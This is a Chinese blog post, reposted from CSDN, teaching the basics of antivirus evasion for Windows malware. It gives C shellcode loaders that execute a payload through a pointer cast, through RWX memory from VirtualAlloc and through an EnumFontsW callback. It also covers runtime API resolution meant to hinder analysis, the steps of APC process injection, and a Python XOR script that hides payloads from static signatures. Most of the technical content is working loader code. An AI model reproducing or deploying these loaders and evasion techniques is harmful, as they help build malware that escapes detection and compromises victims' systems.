免杀开发基础(1)

简介: 本文是关于Windows恶意软件开发的技术介绍,主要包括动态函数加载和执行、Shellcode执行技术以及注入技术。动态函数加载避免了静态链接到特定库,增加了分析难度。Shellcode执行涉及通过指针、内存分配和回调函数等方式。注入技术如APC注入,包括枚举进程线程、分配内存、写入有效负载等步骤。此外,文章还提到了使用异或加密来隐藏Shellcode,以规避静态特征检测。总的来说,文章探讨了免杀技术的基础知识,强调了在恶意软件开发中灵活性和创意的重要性。

前言


版权声明:本文为本博主在CSDN的原创文章搬运而来,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。                            

原文链接:https://blog.csdn.net/weixin_72543266/article/details/137691762


免责声明

   请勿利用文章内的相关技术从事非法测试。若因此产生一切后果与本博客及本人无关。

分享声明

         此篇博文为微信公众号小呆安全的404Xyunxi_师傅投稿的,经过本人同意,进行分享

免杀开发基基础

   本文将探讨与Windows操作系统恶意软件开发相关的基本原理和技术,我们将从探索WinAPI开始,了解代码操作如何在恶意软件开发的背景下工作。我们将介绍动态加载函数和在代码中执行函数等内容。接下来,我们将研究模糊处理和有效负载编码。我们将使用XORAES加密等技术来使恶意代码更难被检测到。

动态函数加载和执行

   是时候进行一些代码的操作了,我们要把代码分解清楚,这样你就能知道发生了什么。

int main(void) {
MessageBoxA(0, "Foo Here.", "info", 0);return 0;
}

image.gif

    这是一个简单的程序。它使用MessageBoxA函数,该函数是Windows API的当中的一个。此函数显示一个带有指定文本和标题的对话框。在这段代码中,我们直接调用MessageBoxA函数来显示一个消息框。MessageBoxA函数在编译过程中静态链接到程序。这意味着函数的代码包含在程序中,因此不需要在运行时加载它。

现在,让我们将其与以下代码进行对比:

int main(void) {size_t get_MessageBoxA = (size_t)GetProcAddress( LoadLibraryA("USER32.dll"), "MessageBoxA" );
def_MessageBoxA msgbox_a = (def_MessageBoxA) get_MessageBoxA;
msgbox_a(0, "Foo Here.", "info", 0);return 0;
}

image.gif

       在这段代码中,我们采用了不同的方法。我们使用MessageBoxA函数动态加载并调用GetProcAddress函数。此函数在运行时从USER32.dll库中检索MessageBoxA函数的地址。

  为了使用这个动态加载的函数,我们定义了一个函数指针类型def_MessageBoxA,它与MessageBoxA函数的签名相匹配。然后我们将获得的函数地址转换为这个函数指针,并使用它来调用函数。

  那么,这与恶意软件有什么关系呢?通过动态加载函数,我们可以避免静态链接到可疑库,这意味着可以使得木马更加难以被分析。这些都是理解如何调整和操作代码的基本概念。

   calc.exe将调用win32 API函数:向操作系统发送请求以创建此进程并开始执行的进程。

Shellcode执行技术

Shellcode执行方式简介一下三种。

1.最常见的一种加载shellcode的方法,使用指针来执行函数

2.申请一段动态内存,然后把shellcode放进去,随后强转为一个函数类型指针,最后调用

3.回调函数执行,申请一段动态内存,将shellcode拷贝进去,然后回调函数执行。

1.指针执行

#include <Windows.h>
#include <stdio.h>
unsigned char buf[] ="你的shellcode";
int main()
{
   ((void(*)(void)) & buf)();
}

image.gif

2.申请内存指针执行

#include <Windows.h>
#include <stdio.h>
int main()
{
  char shellcode[] = "你的shellcode";
  void* zx = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  memcpy(zx, shellcode, sizeof shellcode);
  ((void(*)())zx)();
}

image.gif

3.回调函数

#include <Windows.h>
unsigned char shellcode[] = "shellcode";
int main() {
LPVOID address = VirtualAlloc(NULL, sizeof(shellcode), MEM_RESERVE
|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(address, shellcode, sizeof(shellcode));
HDC dc = GetDC(NULL);
EnumFontsW(dc, NULL, (FONTENUMPROCW)address, NULL);
return 0;
}

image.gif

注入技术

   APC注入利用了异步过程调用。APC是一种软件中断,因为它们必须能够改变程序的主执行路径。例如,Windows API函数ReadFileEx 允许用户编写一些代码,这些代码将在I/O操作完成时执行。为了实现这一点,I/O操作必须找到一种方法来返回最初调用ReadFileEx的线程。这又通过将APC排队到进行I/O调用的线程来实现。

1.枚举线程和进程-ToolHelp 32 Snapshot,

2.获取进程PID。获取目标进程的句柄- OpenProcess。

3.在目标进程分配新内存- VirtualAllocEx。

4.将有效负载写入新分配的内存- WriteProcessMemory。

5.更改内存保护- VirtualProtectEx。

6.对有效负载进行排队-挂起用户APC。

7.等待例程将线程置于可报警状态,SleepEx()、WaitForSingleObjectEx()、WaitForMultipleObjectEx()、Sleep()。

image.gif

shellcode加密手段

采用异或加密,规避静态特征,以下是python加密脚本。

def xor_encrypt_decrypt(input_file, key):
  with open(input_file, 'rb') as f:
    data = f.read()
  # 进行异或操作
  encrypted_data = bytes([byte ^ key for byte in data])
  return encrypted_data
input_file = 'payload.bin'
key = 0xc5  # 这是加密/解密所使用的密钥
encrypted_result = xor_encrypt_decrypt(input_file, key)
print("加密结果:")
print(encrypted_result)

image.gif

image.gif

总结:这只是免杀的凤毛麟角,免杀不光是代码,还有灵活的思路。

相关文章
|
9月前
|
机器学习/深度学习 人工智能 自然语言处理
人工智能在医疗诊断中的应用与前景####
本文深入探讨了人工智能(AI)技术在医疗诊断领域的应用现状、面临的挑战及未来发展趋势。通过分析AI如何辅助医生进行疾病诊断,提高诊断效率和准确性,以及其在个性化医疗中的潜力,文章揭示了AI技术对医疗行业变革的推动作用。同时,也指出了数据隐私、算法偏见等伦理问题,并展望了AI与人类医生协同工作的前景。 ####
671 0
JAVA并发编程系列(9)CyclicBarrier循环屏障原理分析
本文介绍了拼多多面试中的模拟拼团问题,通过使用 `CyclicBarrier` 实现了多人拼团成功后提交订单并支付的功能。与之前的 `CountDownLatch` 方法不同,`CyclicBarrier` 能够确保所有线程到达屏障点后继续执行,并且屏障可重复使用。文章详细解析了 `CyclicBarrier` 的核心原理及使用方法,并通过代码示例展示了其工作流程。最后,文章还提供了 `CyclicBarrier` 的源码分析,帮助读者深入理解其实现机制。
|
网络协议 安全 Python
我们将使用Python的内置库`http.server`来创建一个简单的Web服务器。虽然这个示例相对简单,但我们可以围绕它展开许多讨论,包括HTTP协议、网络编程、异常处理、多线程等。
我们将使用Python的内置库`http.server`来创建一个简单的Web服务器。虽然这个示例相对简单,但我们可以围绕它展开许多讨论,包括HTTP协议、网络编程、异常处理、多线程等。
|
10月前
|
JavaScript 前端开发 开发工具
从零开始使用node.js制作一个脚手架
本文介绍了如何从零开始使用Node.js制作一个项目脚手架,涵盖了脚手架的基本概念、所需准备的第三方库、项目结构的初始化、命令注册、项目创建流程及用户交互设计等内容。通过实例演示了如何利用commander、inquirer等库实现命令行工具的开发,最终完成了一个能够根据用户选择自动创建Vue或React项目的脚手架。
183 1
从零开始使用node.js制作一个脚手架
|
9月前
|
人工智能 运维 安全
阿里云先知安全沙龙(上海站) ——终端安全对抗及防护
终端安全现状面临多重挑战,包括传统签名技术失效、新型无文件攻击频发、专业人才匮乏、分支机构安全管理不足等。企业终端覆盖不全、日志缺失、策略更新依赖厂商,导致运营排查困难。钓鱼攻击手法愈发精细,静态和动态对抗加剧,攻击者利用正常权限入侵,窃取凭据。Web3技术发展使加密货币成为新目标,职业黑客盯上个人钱包和交易公司。防护升级需涵盖预防、检测、响应和运营四个阶段,借助AI和威胁情报降低告警量,提升整体安全水平。
|
敏捷开发 定位技术 开发者
poc Proof of Concept
Proof of Concept(简称 POC)是概念验证的意思。在软件开发领域,POC 通常用于验证某个想法或概念是否可行。它通常是一个小型项目或原型,可以通过实际操作来证明某个想法或技术的有效性。POC 可以帮助开发者在项目开始之前确定技术的可行性,减少开发过程中的风险。
2029 3
|
关系型数据库 MySQL
MySQL 保姆级教程(三):排序检索数据
MySQL 保姆级教程(三):排序检索数据
.cer 文件添加到钥匙串报错:不能修改“System Roots”钥匙串
1、报错信息: 不能修改“System Roots”钥匙串: 要更改根证书是否会被信任,请在“钥匙串访问”中打开它,然后修改它的信任设置 2、网上搜索的答案都是: 钥匙串访问的界面左侧,选择“登录”或login按钮,直接将.
5880 0
|
负载均衡 监控 Linux
CentOS6.5高可用集群LVS+Keepalived(DR模式)
CentOS6.5高可用集群LVS+Keepalived(DR模式)
|
Java 程序员 Windows
[笔记]Windows核心编程《十一》Windows线程池
[笔记]Windows核心编程《十一》Windows线程池
36939 4
[笔记]Windows核心编程《十一》Windows线程池